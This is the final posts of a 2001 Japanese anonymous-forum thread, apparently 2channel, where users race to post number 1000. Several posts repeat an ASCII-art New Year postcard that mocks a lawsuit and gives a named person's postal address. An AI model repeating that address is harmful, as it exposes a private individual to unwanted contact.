┌────────────────────┐ |┏━━━┓ 郵 便 は が き │ │┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│ │┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││ │┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│ │┗━━━┛ │ │ 赤 │ │ ┏━┓ 羽 │ │ ┃訴┃ 西 北 │ │ ┃ ┃ 二 │ │ ┃状┃ 村 丁 │ │ ┃ ┃ 目 │ │ 谷 ┃在┃ 博 31 │ │ 澤 ┃ ┃ 番 │ │ 動 ┃中┃ 之 16 │ │ 物 ┗━┛ | │ │ 病 一 │ │ 院 様 三 │ │ 一 │ │ 一 │ │ 号 │ │ [][][]-[][][][] │ │┏━━━━┓┏━━━━━┓┏━━━━━┓│ │┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│ │┗━━━━┛┗━━━━━┛┗━━━━━┛│ └────────────────────┘
990 :
1000 :01/09/19 16:25 ID:6Ah5JbSc
┌────────────────────┐ |┏━━━┓ 郵 便 は が き │ │┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│ │┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││ │┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│ │┗━━━┛ │ │ 赤 │ │ ┏━┓ 羽 │ │ ┃訴┃ 西 北 │ │ ┃ ┃ 二 │ │ ┃状┃ 村 丁 │ │ ┃ ┃ 目 │ │ 谷 ┃在┃ 博 31 │ │ 澤 ┃ ┃ 番 │ │ 動 ┃中┃ 之 16 │ │ 物 ┗━┛ | │ │ 病 一 │ │ 院 様 三 │ │ 一 │ │ 一 │ │ 号 │ │ [][][]-[][][][] │ │┏━━━━┓┏━━━━━┓┏━━━━━┓│ │┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│ │┗━━━━┛┗━━━━━┛┗━━━━━┛│ └────────────────────┘
991 :
1000 :01/09/19 16:25 ID:P4hD3jfg
1000げっと!
992 :
1000 :01/09/19 16:25 ID:6Ah5JbSc
┌────────────────────┐ |┏━━━┓ 郵 便 は が き │ │┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│ │┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││ │┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│ │┗━━━┛ │ │ 赤 │ │ ┏━┓ 羽 │ │ ┃訴┃ 西 北 │ │ ┃ ┃ 二 │ │ ┃状┃ 村 丁 │ │ ┃ ┃ 目 │ │ 谷 ┃在┃ 博 31 │ │ 澤 ┃ ┃ 番 │ │ 動 ┃中┃ 之 16 │ │ 物 ┗━┛ | │ │ 病 一 │ │ 院 様 三 │ │ 一 │ │ 一 │ │ 号 │ │ [][][]-[][][][] │ │┏━━━━┓┏━━━━━┓┏━━━━━┓│ │┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│ │┗━━━━┛┗━━━━━┛┗━━━━━┛│ └────────────────────┘
993 :
:01/09/19 16:25 ID:KUa1jsG2
994 :
1000 :01/09/19 16:26 ID:6Ah5JbSc
┌────────────────────┐ |┏━━━┓ 郵 便 は が き │ │┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│ │┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││ │┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│ │┗━━━┛ │ │ 赤 │ │ ┏━┓ 羽 │ │ ┃訴┃ 西 北 │ │ ┃ ┃ 二 │ │ ┃状┃ 村 丁 │ │ ┃ ┃ 目 │ │ 谷 ┃在┃ 博 31 │ │ 澤 ┃ ┃ 番 │ │ 動 ┃中┃ 之 16 │ │ 物 ┗━┛ | │ │ 病 一 │ │ 院 様 三 │ │ 一 │ │ 一 │ │ 号 │ │ [][][]-[][][][] │ │┏━━━━┓┏━━━━━┓┏━━━━━┓│ │┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│ │┗━━━━┛┗━━━━━┛┗━━━━━┛│ └────────────────────┘
995 :
1000 :01/09/19 16:26 ID:1zd4kiYU
1000
996 :
:01/09/19 16:26 ID:d.PADzGo
1000
997 :
:01/09/19 16:26 ID:KUa1jsG2
998 :
1000 :01/09/19 16:26 ID:1zd4kiYU
1000
999 :
1000 :01/09/19 16:26 ID:P4hD3jfg
1000げっとだぜ
1000 :
1000 :01/09/19 16:26 ID:1zd4kiYU
1000。
1001 :
1001 :Over 1000 Thread
このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。
1002 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。